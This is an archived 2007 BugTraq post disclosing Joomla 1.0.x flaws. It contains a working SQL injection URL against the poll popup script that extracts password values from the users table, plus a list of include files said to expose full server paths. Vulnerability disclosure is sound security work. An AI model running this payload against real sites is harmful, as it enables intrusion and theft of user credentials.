BugTraq
Joomla multiple vulerabilities (1.0.X >= ) Sep 26 2007 07:09PM
security soqor net (2 replies)
Hello

Joomla multiple vulerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net

Affected Versions
1.0.X -> tested on 1.0.12

and 1.5 maybe affected -> not tested but probebly affected

sql injection
administrator/popups/pollwindow.php?pollid=1%20union%20select%20password

%20from%20jos_users/*

Full path

Many many in
includes/

Examples

includes/Cache/Lite/Output.php

includes/patTemplate/patTemplate/Stat.php
includes/patTemplate/patTemplate/OutputFilter.php
includes/patTemplate/patTemplate/OutputCache.php
includes/patTemplate/patTemplate/Modifier.php
includes/patTemplate/patTemplate/Reader.php
includes/patTemplate/patTemplate/TemplateCache.php
.. ETC

GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD , Le Copra;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;

End of it :)
WwW.SoQoR.NeT

[ reply ]
Re: Joomla multiple vulerabilities (1.0.X >= ) Sep 27 2007 02:50AM
packet packetstormsecurity org
Re: Joomla multiple vulerabilities (1.0.X >= ) Sep 26 2007 09:58PM
Gavin Hanover (netmunky gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus